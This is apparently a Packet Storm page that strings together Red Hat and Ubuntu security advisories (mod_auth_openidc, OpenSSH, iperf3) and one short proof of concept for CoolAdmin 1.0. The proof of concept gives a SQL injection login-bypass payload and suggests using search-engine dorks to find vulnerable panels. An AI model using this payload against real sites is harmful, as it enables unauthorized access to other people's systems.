mod_auth_openidc-debugsource-2.3.7-11.module+el8.6.0+14082+b6f23e95.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37464  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyRWUAAoJENzjgjWX9erEujoP/An7HE6TJHY9+nD7fSVm3B/p  
SizS+cqUhhbHlMqlZ817AwEPfSbNgdcYksU4WA/jUtMSvkVrEXkKUfOzojZ/MgVL  
4AumlmAfNz82psVjxHHTObpiCWFPrHAMzdXEZ8pXS6CxEXwKfK9/6JNx5iXWh+0n  
BWQQJVYS2fLR7AbWIj5JwwGRVBG+xYxctCZC23drEyZ7DuXd47tVQCyF0mXjYEND  
kwyc0ZamOpzf27hvGmqqwE9gNC8ZneZcBKhLKRqMmL5WrQ+btpoe7UZmuHcn+DXv  
MQdZQ3iswvRAfPo3QooHsZ7pzVSW8FMkyMltZKtW79RhZ5ZJXmuU8Gh8KHn5c9kC  
N8sSSJcmOgT6DWQzSZkWfbUl/lq2xrlFS6K8XrnmrSDzkJlnA7zDfUdql09NHheB  
CDcO3ao2jDOeQ85kW1bZSGqcFNN4StGs8ZebYwa0PtDU1E0ZwBBzShwhpRisiSsO  
iQR/NisdnNKo/aq1WNipey9/ywgW0BCOWSg0tsYuOMbbtHdP796MCr9tOLI1aBmC  
Uj29zy8QSyXCFowoVgorORGUXlyNiLne+wDFyhRvcLC32bBnOHeEDATrCh6N5sPt  
7tbOzOO/T711yjQxI2wI1275GENtWrPpLpW/A/nfJ4mmxOeaHtRE1sCX8VaUB4FP  
/GSvPGNSPRvk7SLQjJl2  
=809Q  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4408-01

CoolAdmin version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : CoolAdmin 1.0 Auth By Pass Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://colorlib.com/                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : User & Pass = ADMIN' OR 1=1#[+] Panel : http://wwcddsakoncom/home.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

CoolAdmin 1.0 SQL Injection

Ubuntu Security Notice 6242-2 - USN-6242-1 fixed a vulnerability in OpenSSH. This update provides the corresponding update for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 18.04 LTS. It was discovered that OpenSSH incorrectly handled loading certain PKCS#11 providers. If a user forwarded their ssh-agent to an untrusted system, a remote attacker could possibly use this issue to load arbitrary libraries from the user's system and execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6242-2  
July 31, 2023

openssh vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

OpenSSH could be made to run programs as your login when using ssh-agent  
forwarding.

Software Description:  
- openssh: secure shell (SSH) for secure access to remote machines

Details:

USN-6242-1 fixed a vulnerability in OpenSSH. This update provides  
the corresponding update for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS,  
and Ubuntu 18.04 LTS.

Original advisory details:

 It was discovered that OpenSSH incorrectly handled loading certain PKCS#11  
 providers. If a user forwarded their ssh-agent to an untrusted system, a  
 remote attacker could possibly use this issue to load arbitrary libraries  
 from the user's system and execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  openssh-client                  1:7.6p1-4ubuntu0.7+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  openssh-client                  1:7.2p2-4ubuntu2.10+esm3

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  openssh-client                  1:6.6p1-2ubuntu2.13+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6242-2  
  https://ubuntu.com/security/notices/USN-6242-1  
  CVE-2023-38408

Ubuntu Security Notice USN-6242-2

Red Hat Security Advisory 2023-4416-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4416-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4416  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
iperf3-3.5-4.el8_1.src.rpm

aarch64:  
iperf3-3.5-4.el8_1.aarch64.rpm  
iperf3-debuginfo-3.5-4.el8_1.aarch64.rpm  
iperf3-debugsource-3.5-4.el8_1.aarch64.rpm

ppc64le:  
iperf3-3.5-4.el8_1.ppc64le.rpm  
iperf3-debuginfo-3.5-4.el8_1.ppc64le.rpm  
iperf3-debugsource-3.5-4.el8_1.ppc64le.rpm

s390x:  
iperf3-3.5-4.el8_1.s390x.rpm  
iperf3-debuginfo-3.5-4.el8_1.s390x.rpm  
iperf3-debugsource-3.5-4.el8_1.s390x.rpm

x86_64:  
iperf3-3.5-4.el8_1.i686.rpm  
iperf3-3.5-4.el8_1.x86_64.rpm  
iperf3-debuginfo-3.5-4.el8_1.i686.rpm  
iperf3-debuginfo-3.5-4.el8_1.x86_64.rpm  
iperf3-debugsource-3.5-4.el8_1.i686.rpm  
iperf3-debugsource-3.5-4.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyRWQAAoJENzjgjWX9erECoQQAJj8NlidNc/c+s/v9IEAYXTV  
n14c0Hsh2WYgMBji5tG1LEocAZVM4yXW7MMrroSwiOwGrBJDFRV1hdaZgiXh9rpY  
2df39n49jzCmO+/7atky7kyps2kA4/aSrJhUpw4mR9c5n/epWS9CBf+TYKTOpujV  
JetOEMk5YfOV++KoXVfW57+5tR07CS/vR38ibttCmxTL3iSDnYhuGDopiJ11vP96  
zmZ0+xGvsz69mfhtk59OUrP0VoJS3OP67VNIl4OLWgT+cfLaWYbARTq/ltQQ1FO4  
G8sirMjKneoN5iqKepeRNbaBwM6owJF2wV4isdxuJ/gCLDDTDCgZ0J74bdFLrhLA  
lSgDwHZqv/p8IAChx3A0iU/ZAnKAW19KGxSRVq4j/T7pkeEJjJMCuN35hmTaBrhm  
XaPg/F4oMaUiiVBTQWL5wQU0JjrP47Yt2iWFpFmDdeskfPbyPF1e7tqQR20CnL1m  
hnhc+OKJpDGWI0ICcPo19Fq+Z2DPQ3Cvves0eNt+Yhj8wsK06zEb6wjxe1o6CZhI  
fz/ftVN3fkkl7YTHXSXaOH04gmoM5gCGjVZffvjENcu+6h+E4soO52jsUHkYAIfh  
jItPaJfQo2+6ilqspnWYmXPwPmoeKx/chR3txGbrPmo/je7D0oC+ZvPQUe1PXmcd  
MMnUFeqiwJEzzFhVnnT4  
=TRgF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4416-01

Red Hat Security Advisory 2023-4415-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4415-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4415  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
iperf3-3.5-4.el8_2.src.rpm

x86_64:  
iperf3-3.5-4.el8_2.i686.rpm  
iperf3-3.5-4.el8_2.x86_64.rpm  
iperf3-debuginfo-3.5-4.el8_2.i686.rpm  
iperf3-debuginfo-3.5-4.el8_2.x86_64.rpm  
iperf3-debugsource-3.5-4.el8_2.i686.rpm  
iperf3-debugsource-3.5-4.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
iperf3-3.5-4.el8_2.src.rpm

ppc64le:  
iperf3-3.5-4.el8_2.ppc64le.rpm  
iperf3-debuginfo-3.5-4.el8_2.ppc64le.rpm  
iperf3-debugsource-3.5-4.el8_2.ppc64le.rpm

x86_64:  
iperf3-3.5-4.el8_2.i686.rpm  
iperf3-3.5-4.el8_2.x86_64.rpm  
iperf3-debuginfo-3.5-4.el8_2.i686.rpm  
iperf3-debuginfo-3.5-4.el8_2.x86_64.rpm  
iperf3-debugsource-3.5-4.el8_2.i686.rpm  
iperf3-debugsource-3.5-4.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
iperf3-3.5-4.el8_2.src.rpm

x86_64:  
iperf3-3.5-4.el8_2.i686.rpm  
iperf3-3.5-4.el8_2.x86_64.rpm  
iperf3-debuginfo-3.5-4.el8_2.i686.rpm  
iperf3-debuginfo-3.5-4.el8_2.x86_64.rpm  
iperf3-debugsource-3.5-4.el8_2.i686.rpm  
iperf3-debugsource-3.5-4.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyRWLAAoJENzjgjWX9erEo88P/1OHNL6CR6xt4acUuAVKm+oW  
uoDXhqxaEW6BKftigUM7FShjwgn9M8NrzxvYV4NIgfuVwqFSzhsg4Reoh5osjVov  
tELBhMn/VFVbhVYUC4hYg+X/w1HMkAMYQJOduhk5CL1MzZTMrZNh2u3ULAgCTZkw  
p0KuDJUsXu8+rP2rqm4HjzYd4OopwFYHluwTusMc/E8Hdcyjgf6dUlJF/ckEbMvN  
spE32W2lhNEeWqLevSg20nz7l81jlvl4SMVdpDZUrr0vk4/hmGdwoiVb623Xgkhi  
sFTP6DFcWZRoWx3xJQLUpfczCL+FWEtMfdqOOf42CZzuZMAdZVGuUoOYsO9Uw9Jw  
eOlxVH9ZUVPpf/XC+NF5qi8ZKjwCiyhTxwkWzO1q0t4G7BrRmKtBcI+Jj0KuJX26  
StF0bJsohuQOuN9Swk4FahJwygm9DkYj1AwNlOIMZsPFJ5dV4NjuV3AXRWy6Xmxl  
MM5YMMKxGTcn/iJ/6VEpUnRT9iponYNh9tNOJtgX7JAqiaJtbiYwM4Uddup99A00  
K3fH84C0Te4qvqqNEHpQAqrOlUZyRH0OPuHiFJ1+wRfBXXt5aqyUQ+JBh0fzpMoS  
TzkRdxqVh0fn/W8vCQKR8trdL74V2rAg7UL3x8R7SAtlfMDlAMMcJmqN1YWiS4iK  
BonTKPCd62RC9VL+YOUw  
=eNrN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm